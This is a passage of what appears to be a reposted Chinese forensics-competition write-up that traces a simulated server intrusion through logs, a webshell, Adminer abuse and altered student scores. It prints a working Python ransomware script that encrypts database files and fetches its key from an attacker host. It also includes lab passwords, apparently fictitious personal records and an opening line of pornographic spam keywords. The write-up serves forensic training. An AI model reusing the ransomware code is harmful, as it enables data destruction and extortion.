久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

2021 河北取证比武决赛个人赛 题解 入侵溯源

發布時間:2023/12/8 编程问答 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 2021 河北取证比武决赛个人赛 题解 入侵溯源 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

個人賽

個人賽容器密碼
BDH sha256全大寫
A94686C845696F88525BB9E74FD7F5D38B6C12F7DDC7E5288C2F2D2201151F47

括號內表示該答案也可得分。26-30題每題4分,其余題目每題2分。

服務器部分

2021年5月 (對時間要敏感,做題時要摸清案情,摸清案情何作案動機能,厘清攻擊路線。),接某考試信息中心報案稱,其單位一存儲考生個人信息的服務器疑似被入侵,數據庫被破壞并勒索比特幣,警方當即固定了服務器的鏡像server.e01。經調查警方抓獲了嫌疑人并對其使用的筆記本電腦只做了鏡像PC.e01,請對兩個檢材進行分析,并回答下面的問題:

1. 鏡像sever.e01對應的被入侵服務器源盤sha256為

98C53B2AC30758EF0977FC313D5D1A070EBF51AE09E刪除線格式 0DF36664A5CCF81DF35C5

2. 服務器操作系統內核版本為3.10.0-957.el7.x86_64

3. 服務器配置的網關為192.168.232.2

如果沒有看到這個這個網關地址,點擊左上角的設置列,弘連默認不展示所有列,像一些基礎信息覺得應該能直接取到但是沒有的可以到這個地方看看是否沒點顯示

4. 服務器中有2個登錄過的賬號

5. 服務器中root賬號的密碼為nb7001

導出/etc/目錄下的shadow文件,進行破解

使用john工具cpu全速跑了很久才跑出來

個人喜歡用john

建議直接學習使用hashcat調用gpu來爆破

但是這么爆破總不是辦法,在后面pc檢材分析完之后,有很多途徑可以很輕松獲取到這個登陸密碼,但是題目只做到當前這的進度時是很難獲取到這樣的信息的,所以這就是先對整套題目進行分析,厘清攻擊路徑攻擊意圖的重要性,可能有同學會覺得這樣會花費很多時間去做一些沒有必要的分析,但是實際上比直接硬找會快很多。

6. 入侵者IP為192.168.232.150

五月份發現被入侵并報警,查看該時段登錄記錄,異常信息。

整體分析

前面的基本上都是相當于是需要固定的基本信息,基本上都能直接找到,做到這題是需要一定分析才能做的題目了。接下來先不看題目,先對服務器進行分析,找到攻擊路徑,重建網站數據庫等,再來逐題看題目,這樣不會被題目牽著走,沒思路的時候再來看題目是什么方向的。

歷史記錄里可以看到安裝了pip3 install cryptodemo 這個庫

刪除過歷史和日志

這里執行了一個加密的python腳本,先留個心眼,等題目做到再仔細分析

安裝了好多庫

仿真起

在這里發現加密提示,lnmp-install.log說明這個站可能是lnmp搭建的

可以看到有很多網站,將服務起一下,簡單看一下網站

在這里找到一個備份腳本,應該有定時執行的設定,下一步去查看定時任務


這里找到路徑,可以看到是個定時任務每五分鐘執行一次backuplog.sh

接下來再看一下備份目錄,使用xftp發現沒啥東西,但是備份日志里確實顯示這個是個備份目錄,這就是xftp工具的局限性,修改還是比較方便的,但是隱藏文件是不顯示的

我們使用命令查看一下

后期我們可以設置顯示隱藏文件,就可以看到隱藏文件了


可以看到很多日志,將日志導出,進行分析

所有的歷史記錄都是相同的,這個備份中沒有有效信息,查看一下登錄日志

放到隨便一個目錄下,last解析一下


也解析一下,也沒什么東西

再看一下各個網站

將各個網站的域名加入本地hosts文件

打開瀏覽各個網站,至此我們尚未發現攻擊路徑,感覺網站起的不太對,再查看一下網站nginx 的配置文件

只有默認站點

再找一下vhost下的配置文件,沒有東西

Nginx目錄下發現了配置文件中nginx服務只指向了一個目錄就是/home/wwwroot/mhedu.sh.cn,所以之前對hosts文件加這么多設置訪問到的也都是同一個站點

可以從之前備份中的歷史命令記錄也可以體現

在操作歷史記錄中,入侵者查看了一下網卡信息,查看了一下最近登錄,查看了一下數據庫配置文件,查看了一下網站配置文件,發現網站也是在這個mhedu.sh.cn的文件下,所以直接進去查看了,后面還做了脫庫的操作

接下來可以分析一下web應用的日志

可以先放工具跑一遍,有一個整體印象,但是我一般都是自己先肉眼對整個日志文件看一遍,實在看不過來再用工具,大家平時練習也是練習自己審計為主,同時兼顧工具的熟練運用,比賽的時候以快為主,工具做出不來手工也要會。

可以很快的看到這里images2下面有個1.php,非常異常,對于攻擊路徑而言,很可能是上傳的一句話木馬。


還可以看到有很多對adminer的操作

Adminer是一個基于php的數據庫管理工具,所以等下對這個文件的操作也要著重分析,通過日志工具分析我們發現1.php和adminer.php兩個需要關注的點,然后考慮adminer是否是網站自帶還是黑客傳上去的,如果是黑客上傳的也可以認為是一個大馬

可以看到以這里為分界線,前面都是192.168.232.1的訪問記錄,UA頭為"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"

后面的為192.168.232.150的訪問記錄,UA頭為"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

直觀上的感受是前面日志排列的相對密集,后面的有一定的間隔。而且后面對木馬操作的IP為192.168.232.150,結合登陸記錄中root也有從192.168.232.150登陸過,可以斷定入侵的IP之一肯定是192.168.232.150。

從這里開始往后審計192.168.232.150的操作

這看到前期沒有上傳的操作,全是get,get 1.php之后馬上開始用post開始操作,可以看到上方的文本比較密集,因為我已經將上面的UserAgent都已經刪除了,但是下面文本比較稀疏,是因為出現了新的UA頭,和上面的不一樣,無法替換到,可以猜測下面的POST操作都是使用像菜刀、蟻劍、冰蝎這樣的webshell管理工具實現的。冰蝎3.0 流量特征分析 附特征 - 知乎 (zhihu.com)

后面的流量也看不出來什么,畢竟沒有過程,但是后面shell操作結束后突然對adminer繼續操作,且后面的UA頭是之前的UA頭,最后一個POST包的大小是7781,合理懷疑這個adminer是這個包傳上去的

接下來對adminer的操作進行分析

接下來按照其手法,對仿真起來的網站里的adminer登錄進行查看修改的這些數值,推測一次POST對應一次修改

192.168.232.150 - - [04/May/2021:15:48:36 +0800] "GET /adminer.php HTTP/1.1" 200 1652 "-" 192.168.232.150 - - [04/May/2021:15:48:38 +0800] "GET /adminer.php?file=default.css&version=4.1.0&driver=mysql HTTP/1.1" 200 2194 "http://192.168.232.148/adminer.php" 192.168.232.150 - - [04/May/2021:15:48:38 +0800] "GET /adminer.php?file=functions.js&version=4.1.0&driver=mysql HTTP/1.1" 200 8150 "http://192.168.232.148/adminer.php" 192.168.232.150 - - [04/May/2021:15:48:38 +0800] "GET /adminer.php?file=favicon.ico&version=4.1.0&driver=mysql HTTP/1.1" 200 330 "-" 192.168.232.150 - - [04/May/2021:15:49:23 +0800] "POST /adminer.php HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php" ##可能為登錄 192.168.232.150 - - [04/May/2021:15:49:24 +0800] "GET /adminer.php?server=localhost&username=root&db=studient HTTP/1.1" 200 3192 "http://192.168.232.148/adminer.php" ##用戶為root,數據庫為studient 192.168.232.150 - - [04/May/2021:15:49:24 +0800] "GET /adminer.php?file=jush.js&version=4.1.0&driver=mysql HTTP/1.1" 200 13475 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient" 192.168.232.150 - - [04/May/2021:15:49:24 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&script=db HTTP/1.1" 200 204 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient" 192.168.232.150 - - [04/May/2021:15:49:31 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&table=score HTTP/1.1" 200 2295 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient" 192.168.232.150 - - [04/May/2021:15:53:45 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10458 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&table=score" 192.168.232.150 - - [04/May/2021:15:54:09 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 98946 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" 192.168.232.150 - - [04/May/2021:16:35:32 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E5%BC%A0%E6%99%93&where%5B01%5D%5Bcol%5D=&where%5B01%5D%5Bop%5D=%3D&where%5B01%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100 HTTP/1.1" 200 4645 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" ##/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=張曉&where[01][col]=&where[01][op]==&where[01][val]=&order[0]=&limit=50&text_length=100192.168.232.150 - - [04/May/2021:16:36:14 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E8%B5%B5%E5%A4%A9%E6%AD%8C&where%5B2%5D%5Bcol%5D=&where%5B2%5D%5Bop%5D=%3D&where%5B2%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100 HTTP/1.1" 200 4658 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E5%BC%A0%E6%99%93&where%5B01%5D%5Bcol%5D=&where%5B01%5D%5Bop%5D=%3D&where%5B01%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100" ##/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=趙天歌&where[2][col]=&where[2][op]==&where[2][val]=&order[0]=&limit=50&text_length=100##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=張曉&where[01][col]=&where[01][op]==&where[01][val]=&order[0]=&limit=50&text_length=100192.168.232.150 - - [04/May/2021:16:36:43 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10460 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E8%B5%B5%E5%A4%A9%E6%AD%8C&where%5B2%5D%5Bcol%5D=&where%5B2%5D%5Bop%5D=%3D&where%5B2%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100" ##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=趙天歌&where[2][col]=&where[2][op]==&where[2][val]=&order[0]=&limit=50&text_length=100192.168.232.150 - - [04/May/2021:16:37:37 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10458 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" 192.168.232.150 - - [04/May/2021:16:37:50 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177884&where%5Bname%5D=%E8%83%A1%E9%87%91%E4%BF%9D&where%5Btel%5D=13122787578&where%5Bidcard%5D=341202200402111723&where%5Bscore%5D=564 HTTP/1.1" 200 2685 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177884&where[name]=胡金保&where[tel]=13122787578&where[idcard]=341202200402111723&where[score]=564192.168.232.150 - - [04/May/2021:16:38:10 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177884&where%5Bname%5D=%E8%83%A1%E9%87%91%E4%BF%9D&where%5Btel%5D=13122787578&where%5Bidcard%5D=341202200402111723&where%5Bscore%5D=564 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177884&where%5Bname%5D=%E8%83%A1%E9%87%91%E4%BF%9D&where%5Btel%5D=13122787578&where%5Bidcard%5D=341202200402111723&where%5Bscore%5D=564" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177884&where[name]=胡金保&where[tel]=13122787578&where[idcard]=341202200402111723&where[score]=564##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177884&where[name]=胡金保&where[tel]=13122787578&where[idcard]=341202200402111723&where[score]=564192.168.232.150 - - [04/May/2021:16:38:11 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10734 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177884&where%5Bname%5D=%E8%83%A1%E9%87%91%E4%BF%9D&where%5Btel%5D=13122787578&where%5Bidcard%5D=341202200402111723&where%5Bscore%5D=564" ##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177884&where[name]=胡金保&where[tel]=13122787578&where[idcard]=341202200402111723&where[score]=564192.168.232.150 - - [04/May/2021:16:38:14 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20176743&where%5Bname%5D=%E9%87%91%E5%96%86%E6%98%8A&where%5Btel%5D=52856616&where%5Bidcard%5D=310107200511295728&where%5Bscore%5D=538 HTTP/1.1" 200 2685 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20176743&where[name]=金喆昊&where[tel]=52856616&where[idcard]=310107200511295728&where[score]=538192.168.232.150 - - [04/May/2021:16:38:17 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20176743&where%5Bname%5D=%E9%87%91%E5%96%86%E6%98%8A&where%5Btel%5D=52856616&where%5Bidcard%5D=310107200511295728&where%5Bscore%5D=538 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20176743&where%5Bname%5D=%E9%87%91%E5%96%86%E6%98%8A&where%5Btel%5D=52856616&where%5Bidcard%5D=310107200511295728&where%5Bscore%5D=538" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20176743&where[name]=金喆昊&where[tel]=52856616&where[idcard]=310107200511295728&where[score]=538 ##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20176743&where[name]=金喆昊&where[tel]=52856616&where[idcard]=310107200511295728&where[score]=538192.168.232.150 - - [04/May/2021:16:38:17 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10743 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20176743&where%5Bname%5D=%E9%87%91%E5%96%86%E6%98%8A&where%5Btel%5D=52856616&where%5Bidcard%5D=310107200511295728&where%5Bscore%5D=538" ##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20176743&where[name]=金喆昊&where[tel]=52856616&where[idcard]=310107200511295728&where[score]=538192.168.232.150 - - [04/May/2021:16:38:20 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177641&where%5Bname%5D=%E8%8C%83%E8%AF%97%E6%80%A1&where%5Btel%5D=13611843060&where%5Bidcard%5D=310107200310040411&where%5Bscore%5D=539 HTTP/1.1" 200 2691 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177641&where[name]=范詩怡&where[tel]=13611843060&where[idcard]=310107200310040411&where[score]=539192.168.232.150 - - [04/May/2021:16:38:22 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177641&where%5Bname%5D=%E8%8C%83%E8%AF%97%E6%80%A1&where%5Btel%5D=13611843060&where%5Bidcard%5D=310107200310040411&where%5Bscore%5D=539 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177641&where%5Bname%5D=%E8%8C%83%E8%AF%97%E6%80%A1&where%5Btel%5D=13611843060&where%5Bidcard%5D=310107200310040411&where%5Bscore%5D=539" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177641&where[name]=范詩怡&where[tel]=13611843060&where[idcard]=310107200310040411&where[score]=539##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177641&where[name]=范詩怡&where[tel]=13611843060&where[idcard]=310107200310040411&where[score]=539192.168.232.150 - - [04/May/2021:16:38:22 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10729 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177641&where%5Bname%5D=%E8%8C%83%E8%AF%97%E6%80%A1&where%5Btel%5D=13611843060&where%5Bidcard%5D=310107200310040411&where%5Bscore%5D=539" ## http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177641&where[name]=范詩怡&where[tel]=13611843060&where[idcard]=310107200310040411&where[score]=539192.168.232.150 - - [04/May/2021:16:38:37 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 200 10467 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" 192.168.232.150 - - [04/May/2021:16:39:38 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&page=4" 192.168.232.150 - - [04/May/2021:16:39:39 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 200 11051 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&page=4" 192.168.232.150 - - [04/May/2021:16:39:48 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&page=4" 192.168.232.150 - - [04/May/2021:16:39:48 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 200 10794 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&page=4" 192.168.232.150 - - [04/May/2021:16:39:52 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&page=4" 192.168.232.150 - - [04/May/2021:16:39:52 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&page=4 HTTP/1.1" 200 10783 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&page=4"

不知道密碼,找數據庫配置文件,

這樣還找不到用

find / -name *database* find / -name *db*

這樣的話找到內容就會比較多,需要細細分辨哪個是網站的數據庫配置文件

登錄adminer

數據庫中已經沒有表了

去找到加密文件


#!/usr/bin/python3 from Crypto.Cipher import AES from Crypto.Util.Padding import pad import os import time import requests import sysdef discover_files(startpath):#判斷后綴名,加密以下類型的后綴名的文件extensions = ['db', 'sql', 'dbf', 'mdb', 'opt', 'frm', 'ibd']for dirpath, dirs, files in os.walk(startpath):for i in files:absolute_path = os.path.abspath(os.path.join(dirpath, i))ext = absolute_path.split('.')[-1]if ext in extensions:yield absolute_pathdef modify_file_inplace(filename, crypto, key, blocksize=4096):#加密文件的邏輯with open(filename, 'r+b') as f:plaintext = f.read(blocksize)while plaintext:if len(plaintext) < blocksize:padtext = pad(plaintext, AES.block_size, style='pkcs7')ciphertext = crypto(padtext)else:ciphertext = crypto(plaintext)f.seek(-len(plaintext), 1)f.write(ciphertext)plaintext = f.read(blocksize)def get_machine_id():#讀取machine-idwith open('/etc/machine-id', 'r') as f:return f.readline().strip()def get_time():#讀取當前時間return time.strftime("%Y%m%d%H%M", time.localtime()) def get_key(path, machine_id, time):#將讀取到的machine-id和當前時間發給這個IP(攻擊者IP),接受返回值res = requests.post(url = 'http://192.168.232.150:5000/key/{0}'.format(machine_id),json = { 'path' : path,'time': time})return res.textdef main():#主函數if len(sys.argv) != 2:#判斷傳入參數,如果傳入參數不等于2就退出,第一個參數就是sys.argv[0]代表python3 CRY.py ./studient/中的CRY.pyexit()path = sys.argv[1]#那么sys.argv[1]就是./studient/,將./studient/傳入path變量中key = get_key(path, get_machine_id(), get_time())#調用get_key函數獲取密鑰cipher = AES.new(key[:16].encode('ascii'), AES.MODE_CBC, IV=key[16:].encode('ascii'))for file in discover_files(path):modify_file_inplace(file, cipher.encrypt, key=key.encode('ascii'))#實現加密算法邏輯os.rename(file, file+'.CRY')#給文件名后綴加上.CRYprint(file, 'encrypted.')#打印輸出某某文件已加密if __name__=="__main__":main()

那么我們因為不知道當時的時間,使用這個作為線索,可能要到黑客的電腦中尋找,找到后再編寫解密腳本。

7. 入侵者首次登錄成功時間為15:01:08(14:57:17)(14:59:21)(格式要求:HH:MM:SS,如14:03:27)

這個我也找了半天,登錄時間到底指什么,也是基于再pc上找到的這張爆破成功截圖,開始爆破時間是14:57:14,隨后馬上爆破成功了基于這個時間查找linux首次成功登陸時間,所以第一次成功登錄應該是這個時間之后的第一次成功登錄時間。

找到該時段的日志

攻擊是發生在5月4日14:57:14之后,查找這個時間段的登錄日志、認證日志、安全日志等。

早期unix 在/usr/adm 較新版本 在/var/adm solaris&linux&bsd 在 /var/log lastlog:近期成功登陸記錄 loginlog:不良的登陸嘗試記錄 messages:記錄輸出到系統主控臺以及由syslog系統服務程序產生的消息、 utmp:記錄當前登陸的每個用戶 utmpx:拓展的utmp wtmp:記錄每一次用戶登陸和注銷的歷史信息 last -f /var/log/wtmp vold.log:使用外部介質出現的錯誤 xferkig:記錄ftp的存取情況 sulog:記錄su命令的使用情況 acct:記錄每個用戶使用過的命令 last:/var/log/secure 最后登錄 1、安全日志 /var/log/secure 作用:安全日志secure包含驗證和授權方面信息 分析:是否有IP爆破成功 2、用戶信息 /etc/passwd 內容含義:注冊名、口令、用戶標識號、組標識號、用戶名、用戶主目錄、命令解釋程序 分析:是否存在攻擊者創建的惡意用戶 3、命令執行記錄 ~/.bash_history 作用:命令執行記錄 ~/.bash_history 分析:是否有賬戶執行過惡意操作系統命令 4、root郵箱 /var/spool/mail/root 作用:root郵箱 /var/spool/mail/root 分析:root郵箱的一個文件,在該文件中包含大量信息, 當日志被刪除可查詢本文件 5、中間件日志(Web日志access_log) nginx、apache、tomcat、jboss、weblogic、websphere作用: 記錄訪問信息分析:請求次數過大,訪問敏感路徑的IP位置:/var/log下 access.log文件(apache默認 位置) 位置:/var/log/nginx下 access名稱日志(nginx日志位置) 位置:tomcat、weblogic等日志均存放在安裝路徑下logs文件下 訪問日志結構:訪問IP---時間---請求方式---請求路徑---請求協議----請求狀態---字節數 6.登陸日志(可直接使用命令調取該信息,對應命令last/lastb) 位置:/var/log/wtmp #成功連接的IP信息 位置:/var/log/btmp #連接失敗的IP信息 7.cron(定制任務日志)日志 位置:/var/log/cron 作用:查看歷史計劃任務(對該文件進行分析調取惡意病毒執行的計劃任務,獲取準確時間) 8、history 日志位置:~/.bash_history 作用:操作命令記錄,可篩查攻擊者執行命令信息 9、其他日志 redis、sql server、mysql、oracle等 作用:記錄訪問信息分析:敏感操作

這里在,雖然題解顯得很簡單,但是實際解題上還是需要花費很大的時間精力的。

可以看到在14:57:17這個時間爆破工具成功登錄了,然后馬上又斷開連接了。

8. 入侵者設置了1個定時任務

9. 定時任務將大量日志文件轉存至/tmp/backup-log/(backup-log)目錄

10. 服務器的網站目錄及子目錄中,共存在2(1)個webshell

基于前面的分析,1.php肯定為一個webshell,個人沒有把adminer.php算上,adminer也是黑客上傳的,adminer雖然是正經應用,但是從入侵角度來看就是一個數據庫的大馬,可以算為webshell。出于驗證考慮,將網站源碼導出,使用D盾等webshell掃描工具掃描其中的webshell。

共發現1個可能的webshell

11. 數據庫賬號為root,密碼為nb250250

12. 數據庫版本號為5.5.62

13. 嫌疑人入侵服務器后,在數據庫中共修改了3個學生的分數

這里從先前的日志中,可以判斷,對學生執行了三個post語句,

192.168.232.150 - - [04/May/2021:16:38:10 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177884&where%5Bname%5D=%E8%83%A1%E9%87%91%E4%BF%9D&where%5Btel%5D=13122787578&where%5Bidcard%5D=341202200402111723&where%5Bscore%5D=564 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177884&where%5Bname%5D=%E8%83%A1%E9%87%91%E4%BF%9D&where%5Btel%5D=13122787578&where%5Bidcard%5D=341202200402111723&where%5Bscore%5D=564" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177884&where[name]=胡金保&where[tel]=13122787578&where[idcard]=341202200402111723&where[score]=564##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177884&where[name]=胡金保&where[tel]=13122787578&where[idcard]=341202200402111723&where[score]=564 192.168.232.150 - - [04/May/2021:16:38:17 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20176743&where%5Bname%5D=%E9%87%91%E5%96%86%E6%98%8A&where%5Btel%5D=52856616&where%5Bidcard%5D=310107200511295728&where%5Bscore%5D=538 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20176743&where%5Bname%5D=%E9%87%91%E5%96%86%E6%98%8A&where%5Btel%5D=52856616&where%5Bidcard%5D=310107200511295728&where%5Bscore%5D=538" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20176743&where[name]=金喆昊&where[tel]=52856616&where[idcard]=310107200511295728&where[score]=538 ##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20176743&where[name]=金喆昊&where[tel]=52856616&where[idcard]=310107200511295728&where[score]=538 192.168.232.150 - - [04/May/2021:16:38:22 +0800] "POST /adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177641&where%5Bname%5D=%E8%8C%83%E8%AF%97%E6%80%A1&where%5Btel%5D=13611843060&where%5Bidcard%5D=310107200310040411&where%5Bscore%5D=539 HTTP/1.1" 302 5 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where%5Bid%5D=20177641&where%5Bname%5D=%E8%8C%83%E8%AF%97%E6%80%A1&where%5Btel%5D=13611843060&where%5Bidcard%5D=310107200310040411&where%5Bscore%5D=539" ##/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177641&where[name]=范詩怡&where[tel]=13611843060&where[idcard]=310107200310040411&where[score]=539##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&edit=score&where[id]=20177641&where[name]=范詩怡&where[tel]=13611843060&where[idcard]=310107200310040411&where[score]=539

對胡金保、金喆昊、范詩怡的數值進行了post,而前面的趙天歌和張曉并沒有進行post操作。這里我們還不能確定其具體修改了幾個人的數據,只能有個印象,重點關注這3個。

192.168.232.150 - - [04/May/2021:16:35:32 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E5%BC%A0%E6%99%93&where%5B01%5D%5Bcol%5D=&where%5B01%5D%5Bop%5D=%3D&where%5B01%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100 HTTP/1.1" 200 4645 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score" ##/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=張曉&where[01][col]=&where[01][op]==&where[01][val]=&order[0]=&limit=50&text_length=100192.168.232.150 - - [04/May/2021:16:36:14 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E8%B5%B5%E5%A4%A9%E6%AD%8C&where%5B2%5D%5Bcol%5D=&where%5B2%5D%5Bop%5D=%3D&where%5B2%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100 HTTP/1.1" 200 4658 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E5%BC%A0%E6%99%93&where%5B01%5D%5Bcol%5D=&where%5B01%5D%5Bop%5D=%3D&where%5B01%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100" 